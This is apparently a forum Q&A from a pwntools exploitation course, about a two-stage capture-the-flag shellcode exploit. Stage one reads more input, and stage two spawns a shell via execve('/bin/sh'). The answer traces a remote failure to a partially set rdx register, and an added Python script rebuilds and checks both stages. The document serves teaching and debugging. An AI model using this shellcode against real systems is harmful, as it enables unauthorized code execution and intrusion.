I have been doing a course on writing pwntools-based exploits. While trying a challenge, after all my attempts I receive the error "Got EOF while reading in interactive". In theory my shellcode executes execve('/bin/sh') while debugging, but when I try it on the server I receive that error. My shellcode is the following:
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']

if "REMOTE" not in args:
    r = process("./multistage")
    # break right before the first stage runs and single-step through it
    gdb.attach(r, """
    b *0x040123f
    c
    si
    si
    si
    si
    si
    si
    si
    si
    si
    """)
    input("wait")
else:
    r = remote("(serverdir)", 2003)

# FIRST CODE TO EXECUTE THE LATER SHELLCODE: read(0, buf, 0xff)
# mov rsi, rax      ; buffer address from rax
# xor rax, rax      ; SYS_read
# xor rdi, rdi      ; fd 0 (stdin)
# mov dl, 0xff      ; count, written into the low byte of rdx only
# syscall
shellcode_aux = b"\x48\x89\xC6\x48\x31\xC0\x48\x31\xFF\xB2\xFF\x0F\x05"
r.send(shellcode_aux)

# ACTUAL SHELLCODE. Since it is going to overwrite the previous buffer, execution
# will continue where the last buffer ended, so the new code has to start where the
# first one left off. The leftover 13 bytes hold "/bin/sh\0" at offset 4.
# mov rdi, rsi      ; rdi = buffer start
# xor rsi, rsi      ; argv = NULL
# xor rdx, rdx      ; envp = NULL
# add rdi, 0x4      ; rdi -> "/bin/sh"
# mov rax, 0x3b     ; SYS_execve
# syscall
shellcode = (b"\x48\x89\xC6\x48/bin/sh\x00\x00"
             b"\x48\x89\xF7\x48\x31\xF6\x48\x31\xD2\x48\x83\xC7\x04"
             b"\x48\xC7\xC0\x3B\x00\x00\x00\x0F\x05")
r.send(shellcode)
r.interactive()
I don't want to leak the server IP, so I substituted it with "(serverdir)". As you can see, I have to execute the shellcode in two stages because of the challenge. After the first shellcode_aux, I send a read syscall so I can execute the second shellcode. This second shellcode overwrites the previous buffer, so I have to start the new code after the first one. I use the leftover space where shellcode_aux was to store the address of /bin/sh. After debugging with pwndbg locally, all seems to work fine: the execve syscall is executed with the correct address ("/bin/sh"):
Continuing the debugging after that doesn't seem to give any problems, so I assumed everything worked fine, but when I try it on the actual server, after sending the shellcode it gives me "Got EOF while reading in interactive". I would be very thankful for some help with the problem. Thank you.
I found the problem (actually not me, somebody helped):
The first syscall I execute (in shellcode_aux) is a read, where the rdx register indicates the length that is going to be read. On my computer it is normally very low, so when I use the instruction mov dl,0xff, although I only change the low part, the rdx register has a low value. On the server where I execute it, the rdx value is pretty high, so only changing the low part leaves it still high, and that leads to an error. I added an xor rdx,rdx to set it to zero before the mov dl,0xff and it works.
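As an added example (not code from the question or the answer above), the following plain-Python script builds both stages by hand, with the `xor rdx, rdx` fix from the answer, and checks the layout invariants the second stage relies on: the code of stage 2 must begin exactly at the offset where stage 1's `syscall` ended, the NUL-terminated path must sit at the offset that `add rdi` expects inside the overwritten region, and the whole second stage must fit in the read count. It also models the `mov dl, 0xff` partial register write so you can see what count the read syscall gets with and without the xor. It assumes an x86-64 Linux target (syscall numbers 0 and 0x3b, as in the posted shellcode); the "leftover rdx value on the server" is a constructed input, and the NOP filler in front of the path string is a choice made here. pwntools is not required, so it runs offline.

```python
# Added example (not code from the question or the answer): build the two-stage
# payload by hand, with the `xor rdx, rdx` fix, and check the layout invariants.
# Plain Python, no pwntools needed. Register values used below are constructed.

SYS_EXECVE = 0x3b
PATH = b"/bin/sh\x00"
PATH_OFFSET = 4                   # where the path string lives inside the overwritten region
RESUME_MARKER = b"\x48\x89\xF7"   # mov rdi, rsi: first instruction of stage 2's code

# Stage 1 as posted: mov dl, 0xff writes only the low byte of rdx.
STAGE1_POSTED = (
    b"\x48\x89\xC6"   # mov rsi, rax   ; buffer address -> rsi
    b"\x48\x31\xC0"   # xor rax, rax   ; SYS_read
    b"\x48\x31\xFF"   # xor rdi, rdi   ; fd 0
    b"\xB2\xFF"       # mov dl, 0xff   ; count (low byte only)
    b"\x0F\x05"       # syscall
)

# Stage 1 with the fix from the answer: clear rdx before the partial write.
STAGE1_FIXED = (
    b"\x48\x89\xC6"   # mov rsi, rax
    b"\x48\x31\xC0"   # xor rax, rax
    b"\x48\x31\xFF"   # xor rdi, rdi
    b"\x48\x31\xD2"   # xor rdx, rdx   ; the fix
    b"\xB2\xFF"       # mov dl, 0xff
    b"\x0F\x05"       # syscall
)


def partial_write_dl(rdx, imm8):
    """Model `mov dl, imm8`: bits 8..63 of rdx are left untouched."""
    return (rdx & ~0xff) | (imm8 & 0xff)


def read_count(rdx_before, clear_first):
    """Count argument the read syscall sees, with or without the xor rdx, rdx."""
    rdx = 0 if clear_first else rdx_before
    return partial_write_dl(rdx, 0xff)


def build_stage2(stage1_len):
    """Second stage laid out so that its code starts exactly where stage 1 ended."""
    region = b"\x90" * PATH_OFFSET + PATH          # filler (never executed) + path
    if len(region) > stage1_len:
        raise ValueError("stage 1 too short to hold the path string")
    region += b"\x00" * (stage1_len - len(region))  # pad up to the resume point
    code = (
        RESUME_MARKER                                         # mov rdi, rsi ; buffer start
        + b"\x48\x31\xF6"                                     # xor rsi, rsi ; argv = NULL
        + b"\x48\x31\xD2"                                     # xor rdx, rdx ; envp = NULL
        + b"\x48\x83\xC7" + bytes([PATH_OFFSET])              # add rdi, PATH_OFFSET
        + b"\x48\xC7\xC0" + SYS_EXECVE.to_bytes(4, "little")  # mov rax, 0x3b
        + b"\x0F\x05"                                         # syscall
    )
    return region + code


def check_layout(stage1, stage2, max_count=0xff):
    """Return the resume offset if stage 2 is consistent with stage 1, else raise."""
    resume = len(stage1)   # the CPU continues right after stage 1's syscall
    if stage2[resume:resume + len(RESUME_MARKER)] != RESUME_MARKER:
        raise ValueError("stage 2 code does not start at the resume point")
    if stage2[PATH_OFFSET:PATH_OFFSET + len(PATH)] != PATH:
        raise ValueError("path string not at the offset add rdi expects")
    if PATH_OFFSET + len(PATH) > resume:
        raise ValueError("path string overlaps stage 2 code")
    if len(stage2) > max_count:
        raise ValueError("stage 2 longer than the read count")
    return resume


if __name__ == "__main__":
    rdx_on_server = 0x7ffff7fc6000   # constructed: a large leftover value in rdx
    print(hex(read_count(rdx_on_server, clear_first=False)))  # 0x7ffff7fc60ff
    print(hex(read_count(rdx_on_server, clear_first=True)))   # 0xff
    stage2 = build_stage2(len(STAGE1_FIXED))
    print(check_layout(STAGE1_FIXED, stage2), stage2.hex())
```

With the fixed stage 1 you would send `STAGE1_FIXED` first and then `build_stage2(len(STAGE1_FIXED))`; since the fix makes stage 1 three bytes longer, the path string region of stage 2 is padded to 16 bytes instead of 13, which is exactly the kind of off-by-a-few layout mistake `check_layout` is there to catch before you send anything.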